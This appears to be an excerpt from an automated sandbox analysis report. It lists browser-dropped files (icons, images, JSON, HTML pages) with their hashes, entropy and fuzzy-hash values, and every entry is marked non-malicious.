                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.N.i.C.c.w.m.w.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.z.9.R.S.
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4622
                                Entropy (8bit):4.00060295402022
                                Encrypted:false
                                SSDEEP:96:VYH1rWqtb/0oyhKhxeOYMCNDY9GI8ycMu0pV6DFolkksjpGq13C:Vert9yshxM5OGrPMuwV6ql2jpy
                                MD5:97587F4697A72D4BB7CEAF0EB320D709
                                SHA1:F819CEF5606A1D0F6E6D615EC3B73CCF21CB5DB5
                                SHA-256:49FC0B31BC3567CAB6A6AD1AC6EFE609B11B80D3F3F1B20909CDA1127BC9FC36
                                SHA-512:FDCEFD3B464D7353CD008942E3F4D9AA74E33396090E9D55F71E0BE3A997BB75136DC785F0139921F5B99C80A16FCB8AB7CC6B2A3A31BE5329DEBA3D09BE1A5D
                                Malicious:false
                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".n.q.y.G.W.A.G.w.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.4.t.z.9.R.S.
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                Category:dropped
                                Size (bytes):4286
                                Entropy (8bit):3.8046022951415335
                                Encrypted:false
                                SSDEEP:24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
                                MD5:DA597791BE3B6E732F0BC8B20E38EE62
                                SHA1:1125C45D285C360542027D7554A5C442288974DE
                                SHA-256:5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
                                SHA-512:D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
                                Malicious:false
                                Process:C:\Program Files\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                Category:dropped
                                Size (bytes):758
                                Entropy (8bit):7.432323547387593
                                Encrypted:false
                                SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                MD5:84CC977D0EB148166481B01D8418E375
                                SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:HTML document, ASCII text, with very long lines (57870), with CRLF line terminators
                                Category:dropped
                                Size (bytes):192751
                                Entropy (8bit):5.462558882571489
                                Encrypted:false
                                SSDEEP:3072:U+aqnHFLOMsPDWH+BCDheFhWNyhxpAOukO/xYb:ZHnxOMsPDeDheiNyhnAwsxYb
                                MD5:691ABD2331CEA76092F54679C3468211
                                SHA1:CA05E1CBAF4641B9C6E7D52167142CD79B88A146
                                SHA-256:FA9BFD7061FEB30D572147325ABFF516435DC7ABCB7FC7EFD23A72094FFECAF2
                                SHA-512:C0ACAA28BC32B956E8886DCBEF54817FCB7AE0CD988EF3B8282398D01580FFA43E9C54F0F34872FFF1514BFB7EE9E8A91561E1C10D1B9AC98AB31398F03AC5F9
                                Malicious:false
                                Preview:<!DOCTYPE html>..<html lang="en-us" dir="ltr" >..<head data-info="f:msnallexpusers,prg-sp-liveapi,prg-sh-bd-tprc,cprg-wpoinfop-log-t3,1s-wpo-viewsinfv3,cprg-wpoinfop-t3,prg-wpo-infop,prg-wpo-noscrl,prg-s-clgen,ads-flr-unify-t,sidamo-flr-stage-2,shstrdealndnf,prg-sh-str4car,prg-sh-strdndnf,prg-1sw-sageuiev2l0a_cc,prg-1sw-sa-golden-en-2t33,preprg-1sw-sa-recalljobc,prg-1sw-sa-416vfcoldv4ct,prg-1sw-sa-uierevwfrc,prg-cg-upd-genre,prg-1sw-flwpro,prg-1sw-p1wi-aad-c,prg-1sw-hupsell-tr3,prg-1sw-hupsell-3,prg-1sw-hupsell-tip,cg-ntv-shr-hero1-ctr,prg-1sw-rivddr-low,prg-1sw-rivcovrdlow,iframeflex,prg-adspeek,1s-winauthservice,prg-1sw-gmcon,prg-pr2-widget-tab,prg-pr2-fipthcc,prg-ad-1s-va,1s-ads-ntpvertical,1s-fcrypt,prg-cookiesync,1s-wpo-prg1-mayctrl,prg-premier-pr1-t2,1s-preant,1s-xapentprong1,prg-1sw-pro2pre,prg-wpo-pnpc,1s-ntf1-rctrdp100,1s-wpo-pr2-2c-13,prg-pr2-2cpinfo13,prg-pr2-river34,1s-ntf2-ctrpc,prg-upsaip-w1-t,prg-upsaip-r-t,prg-cg-blocking-pwa-c,prg-cg-seclarity-c,1s-rpssecautht,prg-1sw-
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):5249
                                Entropy (8bit):7.949396418132118
                                Encrypted:false
                                SSDEEP:96:Qgm8H9XfA7trV8p3i6UuqVkHd1z3jQNoMGCeqbmKFufB2tmMAXdz6dFJmQQYbYa:JmoFIJapZUumsx3jQNve3B2IMWt6dFca
                                MD5:3E5D0184ED75D472C6F58208B3BE6089
                                SHA1:2DEA4AE4F8069405DF9C5D6C6482AAF6EFDA5400
                                SHA-256:3FEC3CBC019F5765EA864A1E7E18FC5A387C8AE6B75258F875E025DB005F5E65
                                SHA-512:84569BDB5AD72D5DC49D9D80C810309029154341538BF889A16CB23D2F4CCB278DA5718F27BF0300A5890D9531C903816DD20BF3A041608C24B4E19524CEF923
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):125250
                                Entropy (8bit):5.366459254148267
                                Encrypted:false
                                SSDEEP:1536:QY0mqjfSB5TUVJTwzIYo4c/tJX+QiKCWczYxreKan5CPO4a8+DHAizsjqLZ7Ea7l:Ata5T+0K4KaQiNuF24AdsWLZ/7l
                                MD5:4851F99F7147D56FB954D81055CA2D3D
                                SHA1:8D7982E0B6329C0460F0EE61CCA0151181326F2B
                                SHA-256:97711CF6D03D55D6DFA7BA68473B2D0D3C64C963463100F87F6792A4D0D080C1
                                SHA-512:21F2B58E5FAAF45A80D5E472901A430F3FE49286694991E303939D1280716885F4A31C422411843B02A9CE9F409A8042E0A39320A4CAF0FF1F114870D581F7E8
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 1260 x 293, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):39155
                                Entropy (8bit):7.8985187905985486
                                Encrypted:false
                                SSDEEP:768:c3+SnZXFurjYW0X0RJ/Dd18i72A/qcQ6Nj2CG+CiTZ2co4IXnmDt:DSnZXFuPSX0f837cQnCG+3WZXmx
                                MD5:E161E2045A32E4513E81954B1D83B953
                                SHA1:0A06306203C286B8C342CFD856C1EE3F16728C7E
                                SHA-256:7A344D69BC6657592E6041F0ED4F53F56ABA90B97EBD94559198B1D059DC7F64
                                SHA-512:7C7E5C2D2A0DF749BB4B52F2E8042829AE8ADD4F242674E13C14FEC436E56D7B173318D8408DD5A33462D38BC1FD2AD932B2060994B5A0C46F4B4BA89922437F
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:dropped
                                Size (bytes):89947
                                Entropy (8bit):5.290839266829335
                                Encrypted:false
                                SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):114061
                                Entropy (8bit):5.307012049157311
                                Encrypted:false
                                SSDEEP:1536:e3McMjaZegNcJt0zJo/2usm2jU/bz3Tscej3jdjFIb:e39Ea4n0zJo/2uvbz3Tsvj3jdjFIb
                                MD5:228AC2C84076AB54209826B7F6DD0A9A
                                SHA1:F6D4E9D6B9A92899695ABEACD4C34C6ED069670B
                                SHA-256:DBFEB7A2D327134C020E5C95E7ACA20245BCEF6C658DFE3E9E4D0A6958A61F1D
                                SHA-512:F3294A36940E90112609F886AD427AACBB4CF221AF8832EF4EE6E83BBD68EB255D99A2FD165831818B5ECC7A8B598509FCF725801B97B1BA621123B55928A161
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):15934
                                Entropy (8bit):7.952284158571437
                                Encrypted:false
                                SSDEEP:384:SlW2Kv6oA2WkIEhv1XYPhYHwXsxT+GEkgZz9it:Sg2KvxAYv1IZY/iGEkKit
                                MD5:9F8B1C2DDA0CA815C8DBDAA3C41169BE
                                SHA1:D68CF0E115518124BEF5291A035AEFC862FA1877
                                SHA-256:C5F1EC31E8D2D61642A1CB5685E0A2EC397AF970C28A77D2CA19038B3B21D4C6
                                SHA-512:F8599FAC9CEED0E5F183605A8E9EEA98B3CD94EDC442C2AE0ECD493977907CBC7FD86C9829CEFAD2265ED3EF79AA8DC4C1AAE781E9E05E96E8F3954F09E627F5
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):10265
                                Entropy (8bit):7.949833788521819
                                Encrypted:false
                                SSDEEP:192:S/8Y2Jaqpe6a4u10f1vT/OBWeRSOonot/w5y0LALI2zOxgZh+wpSGKYPC7O5hH:SUAKa76pDOBNI5y0LMI2zOD8xYKH
                                MD5:9553BC52CF4983FEFDAFE23CFC8B822C
                                SHA1:346A543EAED3E6DDCA0D47715027C5A3B84B4387
                                SHA-256:488B26EAB8726FCED24C45D207746A39D5F1EC9D6F4CC2FF8FB82ABC5CD3B52C
                                SHA-512:A4E74AB2FAA8E6D074B3540160DCE9A89241D058D03ED270D3C492A13EBE612C66A7097EA5C6313EACFC92D36F79F3479F1D5D6015D7F32E24B423CFC69E99C4
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 620x304, components 3
                                Category:dropped
                                Size (bytes):53823
                                Entropy (8bit):7.965109132077611
                                Encrypted:false
                                SSDEEP:768:RDocXszesa06au73MjQWOWhCBzEHHUaZRJ9AyHnimd6M/JlbZuzvpB4BYDXZxC3:R8c8z5032LRCSlPgorkvPoYDa
                                MD5:F69BD637EC23CA3BF1CC276909FBCC96
                                SHA1:983BB8191AC89164FF1B5C10875B1988DB4C04D1
                                SHA-256:6B1B4053F5786C48275F0357702844AF24E6EE7174082756DA6C4E2F9B249E19
                                SHA-512:5BE70D2E0899E6308BA86CC701FF6355E50AB5A359FE4DEFFE172098559F3B4AF34B68CCFD3CFA58C491AFC47B7E3AE4BD03606FCE5BE72698C628AB38457870
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):11340
                                Entropy (8bit):7.946989282986151
                                Encrypted:false
                                SSDEEP:192:SMRu/YNlLKsJrCVmEKl6bhcUXzriqO6XW1RJ73+kYoLHNKsENAuyW9e:SqNUErCzKlsrX1O1r+loLAsENAuywe
                                MD5:40138320BA5A02A05F5EE2B735483D69
                                SHA1:61FF8B863012C273EA50F6372D1A02E95C5AA98F
                                SHA-256:C1A8052FFFC2E928C167CD0130119905A55965A17BEBC683AC39EB4B699C8199
                                SHA-512:7CDE7B8AA615D9F01A8612ADDE3766B19A46E9616239DA9431BDB8E93A7DD2CBC51360FEADE692F6A475D0FC3993975E52432DFC2D6F5C1BF2C393B5C6891D86
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):18275
                                Entropy (8bit):7.967390932976092
                                Encrypted:false
                                SSDEEP:384:SbjvGn3azjtSLtgmRZEHAn9zjAkONw7ZNqqvx9yEc6ckHLDYPLA1e6JkYu8Z:SbjSiw9zjA3+NNqEyqrsxIJu8
                                MD5:397FDBBCC4AFA9F6E4A81A9B6BB331BD
                                SHA1:10E58F3330A75AD72E591208E5CE2D52838FAB5C
                                SHA-256:CCD4533381A60A84B1BF331FBA55D45537542684F87F473C78B0A8E08043535F
                                SHA-512:EF21987658C0B7B59B84EF364D22284271C260D90F4B6CB562253567A793AA69200931F5DDCFE54569C4D7A870C5E23721BC1C3CE65C0D39408FB52FC09A4FE4
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):3353
                                Entropy (8bit):7.899130124969502
                                Encrypted:false
                                SSDEEP:96:+JCKKxvfRuX7q3Kt/1sQfDFNVL/klAXHjegxkQhRdo7SKKS:+0KKxg3/DfpPLsOzFaQhE7SKKS
                                MD5:A2D9EC76C1347D7986A90D548C453449
                                SHA1:8CBE828A6B8FFB514C7C5666998C310935B0F3CF
                                SHA-256:3C7A6558CAB24C3DD577AE362D1A3614DDF146E433B897987F18D32A1CFA2335
                                SHA-512:956174788FCD783F0531DDBCB0B79AF88D9D52F45A57E15A0F9C48BBFD3F90A67CFB8DA9D1E8CA7F6178D39650251272C3E4A780EBF0C12D2C4270EBAB249FE3
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):7.247381939128456
                                Encrypted:false
                                SSDEEP:768:6f4guXWAi3fJrePjdAsVpb1W2UnpZkcZv6lMGA:6wGAiPZyxpBwntZSyb
                                MD5:9F0C9778F6321BABFA33DF2DD07E9A3F
                                SHA1:EDC64D158A69623FC09D29270E7E263B1DD7AE39
                                SHA-256:D3FE8FC96760803229C96594A24641F2DCE05F1146CCF17991A73EE73F4C725D
                                SHA-512:C7CCFB2E615788BD691EB55EE89984D62B9ECFBC919BB735D127267B93344E46DD560442951A215A19480B80D271E544B4AA0EFB2410A06EAAD1FC5CB7DCB5F2
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):7.0106052379119825
                                Encrypted:false
                                SSDEEP:768:fBb6dUBFRyzDzSZyQakYxgGOLU2b+4jyog:fJCU/4zDzSZyQTLnLr7
                                MD5:67AD21AAB7F1F4BBA17DA29D339F8813
                                SHA1:8E9ACC62DD7A6812E7C3B187E4DECF7889AFCA1E
                                SHA-256:F4AE117C8C6795EDDE91522E93E61EB09A4AAA4EC003BAA9294B942376D4ABD0
                                SHA-512:90FF0FBBD8B24489F3F933E39C91D1494B48B9D6F8E2142AD2E10C36B96DE36F97423DFF0FFE61BACA3BF08D28801AE46696DA3539CCE19F0C7A500E60E8552A
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):32768
                                Entropy (8bit):5.193541214149857
                                Encrypted:false
                                SSDEEP:384:fIXEDyquoHODCmbAoYygTuTaTObX5zI8WruL7NLc:fIXEDyquouCm9OTgaKbFMw
                                MD5:89AC487C3FE185FD1AAE05C3B37D9D59
                                SHA1:D20477DC4C5E66EF17867A79BF5CEBA3EFCF89DB
                                SHA-256:21F67B28327A3CDBFC227FC8846B7EB391A24B8058944D151360D73872803B05
                                SHA-512:1ED295712C261F71A999075395484DDBED894D3C4234E4925456620F1D5B3E645C3BFF3C8255DEDB9C41AA187AE7A8F8D7C0AE3A398AA0DB258629730C93D110
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):224
                                Entropy (8bit):6.3996615625377125
                                Encrypted:false
                                SSDEEP:3:yionv//thPl9vt3lUkC9/gnbBnq6iW2KrDkMQuwRn2zdqhDnOur9dwsiAJjnRQw3:6v/lhPUCnFq0P62xqZnNH0G1QqLp
                                MD5:AC370205FBECDF515D209C1840F11F73
                                SHA1:7E5C86F49AAC87EEAA85AC0C3DBD278FBC7C9B80
                                SHA-256:69417361260FE0333D180D084AB0A6F6DDD81448B144CB7272CFE5D3C91FCCEA
                                SHA-512:37179F6F8C40529C9CA95AC04E0B6C0137A84CCFD15221B27836F8C3104E889C0D96196B303611D515CA59FF0C6BFA76D3BDC4C277C2F4AF84A52F35850B6C54
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):18737
                                Entropy (8bit):3.2062466761310993
                                Encrypted:false
                                SSDEEP:96:bSDZ/I09Da01l+gmkyTt6Hk8nTKkEWmIKJHxNXrNXNsc5MVNzhpA:bSDS0tKg9E05TKk6L5gpA
                                MD5:23961A289D57B15CE78E725C8DB95124
                                SHA1:AD22B0DF2C88DCF74C75618042809EC228660100
                                SHA-256:0B428DC30D2F11B851BB4790799644079FD5102F760496BCEE1DDD5447B3233E
                                SHA-512:D90984851193DA69AEF3FFA6F5F2710D230533205A190619A47F006EE9D6CE92085B0E04C23BED04269057B3620B3CA732679A1EE4F1134B6C60C7498672CC53
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):4934
                                Entropy (8bit):5.323780447870239
                                Encrypted:false
                                SSDEEP:96:rW9l8cACHmmtuHhzJsCzdZ4D3CI8jH5j+Am8CyjI:rWH8XiPtwXsES358b1+ABlI
                                MD5:3818CFD260DE412A94AF25C9B1A193C2
                                SHA1:2EB532EFED4BAB5CFFE20FACC995BA02FAB2F246
                                SHA-256:B2C5E1901B09B528B7F55EE01AD1FEFAEB91DEF7BC7670EFB7B9679C224B9F26
                                SHA-512:DA19595AD4BBF157871512539FB8929F467FAED1556B8B82212D2B0BF8255C17290298AA26228EC33214638857EFABBA08B1243B0C1812C674EF3B4C3471FD4E
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1, orientation=upper-left], baseline, precision 8, 16x16, components 3
                                Category:dropped
                                Size (bytes):16488
                                Entropy (8bit):5.795380301582204
                                Encrypted:false
                                SSDEEP:192:CkmjJWwEn+/DBeYKrwf4kfnqWtlCMOwWPnc4SOW:BVwM+bBeDwf4hmkMOwWPnjSOW
                                MD5:28417FF2252EE9A50F05CEC70D3369AD
                                SHA1:E38587AC7F5E8AFD01821F6CF0091C2EC95E6C32
                                SHA-256:4A9D2733B278BFAF9550E4B5BCC3D6A236ECD620E6FFEB3C2131059312BAF462
                                SHA-512:95EB2C9B0D71220EBB8A8AB80C68A65D7C4BA779D0E739A9CF866E6CA468243D1785F675623122A4B0FE7C144AA81ABE3B6074A695406DCAB647822FB00A4229
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 1633 x 708, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):27928
                                Entropy (8bit):7.701164569435742
                                Encrypted:false
                                SSDEEP:768:xSufGKAfaoovahBv4apFM4lvzDpqFosGd+Up9FIK0B:jfUMve54E//fCiIK0B
                                MD5:862D29153222B9B15C3C73B61B930335
                                SHA1:391BEBF4BA8910B718C5516491EB1C7D32D4C187
                                SHA-256:3EC8FA41DCE2684102F4A7B2D993388809CC2F6AE0616807CA9E3D94E6D19AC2
                                SHA-512:6FFCB08DE27DFA571C8EF35E7F017F2871482581308C10CF38EFF9A507D02325222B899D667FC86227C2985ACA05F17C1CD33EF4163BE3442F70F8907BD78404
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 375 x 180, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):23972
                                Entropy (8bit):7.983082688064765
                                Encrypted:false
                                SSDEEP:384:OQCmhN3Hqqm87sSOvS8PJKCqedNV7TMzNjdpNQsjtHnUSQkBmSfYuoq9Dgt:dCmr3KqmIdO68MAnnWNjdpBSSQVfWDgt
                                MD5:64C4757048F068394817EE126FDBA8A6
                                SHA1:3610DC2EB5E3C09809E94BD0694A06C7A51580FF
                                SHA-256:A9FEC8F56726ECA81D0600220A6B168FFF112A5283741FD5EC63509AEDBB51D5
                                SHA-512:373EE45E16D231B2FF8A897A357A52A58B63430E0BCF728867879F2E10E55C631589D6F63C1675E2E40EB1EF7CEB59B15DF18013EA0F3FA352A3B36296F14DAB
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x157, components 3
                                Category:dropped
                                Size (bytes):16084
                                Entropy (8bit):7.953253196706112
                                Encrypted:false
                                SSDEEP:384:S5c+1WQP8Zd41jj9S4H4e+Iolx01jD8hj/g6QMISuSck:S5c+4QEZWJ5Sv2olx09fMInSck
                                MD5:F5046540689F51724ED129D0EF033107
                                SHA1:D6BC4318E47CEEFF0063D8C3CA38395481BC599C
                                SHA-256:9AA702297FABF784581BA69A35C5DF2B3265ED5BCC01B61370D058C177831B25
                                SHA-512:9ABDA303D9BC69CCB369022769977FF85B210592218C6E094F90150C8C6D6639C4278971EBD4AA6C97C2D9DFA9E55696D7BC3D92C07ACC3FE52B0D067DA87FEB
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):405
                                Entropy (8bit):7.210520499858802
                                Encrypted:false
                                SSDEEP:6:6v/lhPkR/C+nyke1I1bDhfWTOnJNGflEHdYo93zyW0X22PrmLo2qufrYXup:6v/78/UIFdcOJWad/ycCraq+rYs
                                MD5:C549DF847E13659AF701C4E359AAF61C
                                SHA1:88C4025B41357295948213E0F5BA7C95B30731B4
                                SHA-256:38D0FE0FE42DABD600CD0F434AA7138A11425B0F675EE7C4EE350C2D3ED67CBB
                                SHA-512:1D3E1A08F171EFE02161F6A672A2DEF35B35967E47E0D58CC71B93FF4758387984A96A59EC99FC8C122FCAC1F7912D9E7685808F9889D80A3A24CA6B15651ADB
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:PNG image data, 96 x 96, 8-bit grayscale, non-interlaced
                                Category:dropped
                                Size (bytes):1113
                                Entropy (8bit):7.727456978400816
                                Encrypted:false
                                SSDEEP:24:6CdYQBAcBrSJs9tION6Gvx8nwpIZ/YCq46Ru3Nqm1NL4nz:6cYQBnPtLnx8wY6uJ54nz
                                MD5:AF5A688C4ACBA6C2E57518F2A93A36EB
                                SHA1:0FA67A1240915DBC819962263F2EFCC4380AB4B9
                                SHA-256:F5B1B30384C129ED683EC4B26BDC18D8EA02B58155B816CC1B646ABACFF06E53
                                SHA-512:4B17038A0CD1CC6491FBC9F13B090E64D0B99BF55CFF69CDD85BE73E9784CC55CCEF7EF39E1BCF6660AAC6763B98D1FD6F840462C0E85D857F9CF97DCDBB6204
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:HTML document, ASCII text, with very long lines (57901), with CRLF line terminators
                                Category:dropped
                                Size (bytes):192720
                                Entropy (8bit):5.462293350111985
                                Encrypted:false
                                SSDEEP:3072:U+aysHFLOMsPDWH+BCDheFhWNyhxpAOukO/xYb:ZVsxOMsPDeDheiNyhnAwsxYb
                                MD5:D6AFE9CF46DF3F31025FE77D4CA86541
                                SHA1:3E03D7EE0B83F4AE53C3037241B6906825DE4F5B
                                SHA-256:6C917BD141E745A39D427BA93F333CC24FF5A89AC94736745BCA16E97610270A
                                SHA-512:4BFE6FFD4A4D3E4658DBAFC697048ECBE35F063EA8A5F2642D108A1790A9A6C53CBD456AF1E8E4127E80C0385AFF48B072E68A28EE96858E755F3DCDB6177FA1
                                Malicious:false
                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                Category:dropped
                                Size (bytes):289638
                                Entropy (8bit):5.423741599504515
                                Encrypted:false
